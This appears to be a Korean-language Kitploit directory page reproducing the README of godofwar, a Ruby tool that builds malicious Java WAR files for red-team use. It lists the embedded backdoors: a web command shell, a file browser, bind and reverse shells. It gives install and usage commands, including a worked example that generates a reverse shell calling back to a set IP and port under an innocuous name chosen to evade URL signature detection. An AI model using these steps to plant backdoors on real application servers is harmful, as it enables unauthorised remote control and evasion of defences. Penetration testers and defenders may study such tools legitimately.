Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
godofwar — GodOfWar - 악성 Java WAR 빌더, 내장 페이로드 포함 | Kitploit
도구/GitHubGitHub/kingsabri/godofwar
Payload GenerationExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubkingsabri/godofwar

godofwar

GodOfWar - 악성 Java WAR 빌더, 내장 페이로드 포함

저장소 보기
1253417년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

GodOfWar - 악성 Java WAR 빌더

침투 테스트/레드팀 목적으로 WAR 페이로드를 생성하는 명령줄 도구로, Ruby로 작성되었습니다.

root@kitploit:~
                              .
                             hhh              
                            hhhhhhh           
                           hhhhhhhh        
                          hhhhhhhh+        
                         hhhhhhhh'           
                        hhhhhhhh.            
                       hhhhhhhhh             
        ..--          hhhhhhhhh             
      -sh/..  +.     hhhhhhhhh:              
      /+/:-/+ss-`   hhhhhhhhhh:               
      /MMM`ss:``.`  hhhhhhhhhh:              
     .MMMMM:        hhhhhhhhhhhhhhhhh:       
     MMMMMMM:        hhhhhhhhhhhhhhhh:      
     MMMMMMMMMMMMM:  hhhhhhhhhhhhhhhh`       
    :NNm:odh/oMMMNs. hhhhhhhhhhhhhhhh`       
   ./:`smdo+oos++-    `++sNMMMMMNmh+         
      .-y-`     ` :.  /   -dmddhhhhh-        
       o/-     `//o/ /M/   `+hhhhhhhh`       
      /o     :yosmy   +y  .`.hhhhhhhho       
      +`     /../.:      `.y::hhhhhs:`       
       `      `+yys`   .sy` /oohhy:          
                `/:s/-``     `.hh`           
               ..`     `       y+            
            .hNNmmNdymmmmds`   :-            
            hs.   ``..    :y-  `             
               -hhmNmddm+   .                
               `NMMMMMMm                     
                ` `oMMy                      
            `.     /Md-      :o  
           MMMMMMMMMMMMMMMMMMM:             
            MMMMMMMMMMMMMMMMMM:              
             MMMMMMMMMMMMMMMMM               
              MMMMMMMMMMMMMMM.               
              `MMMMMMMMMMMMM.                 
                :sNMMMNMdo:                  
                  ``+m:/-                    
                     `                                  
GodOfWar - Malicious Java WAR builder.

기능

  • 기존 페이로드. (-l/--list 참조)
    • cmd_get
    • filebrowser
    • bind_shell
    • reverse_shell
    • reverse_shell_ui
  • 구성 가능한 백도어. (--host/--port 참조)
  • 페이로드 이름 제어.
    • 배포 후 악성 이름을 피해 URL 이름 서명을 우회하기 위해.

설치

root@kitploit:~
$ gem install godofwar

사용법

root@kitploit:~
$ godofwar -h 

도움말 메뉴:
   -p, --payload PAYLOAD            사용 가능한 페이로드 중 하나에서 WAR을 생성합니다.
                                        (-l/--list 확인)
   -H, --host IP_ADDR               선택한 페이로드의 로컬 또는 원격 IP 주소
                                        (-p/--payload와 함께 사용)
   -P, --port PORT                  선택한 페이로드의 로컬 또는 원격 포트
                                        (-p/--payload와 함께 사용)
   -o, --output [FILE]              출력 파일 및 배포 이름.
                                        (기본값은 페이로드 원래 이름입니다. '-l/--list' 확인)
   -l, --list                       모든 사용 가능한 페이로드 나열.
   -h, --help                       이 도움말 메시지 표시.

예제

모든 페이로드 나열

root@kitploit:~
$ godofwar -l
├── cmd_get
│   └── Information:
│       ├── Description: Command execution via web interface
│       ├── OS:          any
│       ├── Settings:    {"false"=>"No Settings required!"}
│       ├── Usage:       http://host/cmd.jsp?cmd=whoami
│       ├── References:  ["https://github.com/danielmiessler/SecLists/tree/master/Payloads/laudanum-0.8/jsp"]
│       └── Local Path:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/cmd_get
├── filebrowser
│   └── Information:
│       ├── Description: Remote file browser, upload, download, unzip files and native command execution
│       ├── OS:          any
│       ├── Settings:    {"false"=>"No Settings required!"}
│       ├── Usage:       http://host/filebrowser.jsp
│       ├── References:  ["http://www.vonloesch.de/filebrowser.html"]
│       └── Local Path:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/filebrowser
├── bind_shell
│   └── Information:
│       ├── Description: TCP bind shell
│       ├── OS:          any
│       ├── Settings:    {"port"=>4444, "false"=>"No Settings required!"}
│       ├── Usage:       http://host/reverse-shell.jsp
│       ├── References:  ["Metasploit - msfvenom -p java/jsp_shell_bind_tcp"]
│       └── Local Path:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/bind_shell
├── reverse_shell_ui
│   └── Information:
│       ├── Description: TCP reverse shell with a HTML form to set LHOST and LPORT from browser.
│       ├── OS:          any
│       ├── Settings:    {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}
│       ├── Usage:       http://host/reverse_shell_ui.jsp
│       ├── References:  []
│       └── Local Path:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell_ui
├── reverse_shell
│   └── Information:
│       ├── Description: TCP reverse shell. LHOST and LPORT are hardcoded
│       ├── OS:          any
│       ├── Settings:    {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}
│       ├── Usage:       http://host/reverse_shell.jsp
│       ├── References:  []
│       └── Local Path:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell

LHOST와 LPORT로 페이로드 생성

root@kitploit:~
godofwar -p reverse_shell -H 192.168.100.10 -P 9911 -o puppy

배포 후, (http://host:8080/puppy/puppy.jsp)에서 쉘에 접속할 수 있습니다.

기여하기

  1. 포크합니다 ( https://github.com/KINGSABRI/godofwar/fork ).
  2. 기능 브랜치를 생성합니다 (git checkout -b my-new-feature).
  3. 변경 사항을 커밋합니다 (git commit -am 'Add some feature').
  4. 브랜치에 푸시합니다 (git push origin my-new-feature).
  5. 새로운 Pull Request를 생성합니다.

더 많은 백도어 추가

더 많은 백도어를 추가하여 기여하려면:

  1. payloads 디렉토리 아래에 새 폴더를 생성합니다.
  2. 새로 생성된 디렉토리 아래에 jsp 파일을 넣습니다 (디렉토리 이름과 동일하게 만듭니다).
  3. payloads_info.json 파일을 업데이트합니다:
    1. 설명.
    2. 지원 운영 체제 (되도록이면 범용으로 만드세요).
    3. 구성: 기본 호스트 및 포트.
    4. 참조: 페이로드 출처 또는 제작자 크레딧.

라이선스

이 젬은 MIT 라이선스 조건에 따라 오픈 소스로 제공됩니다.

도구 다운로드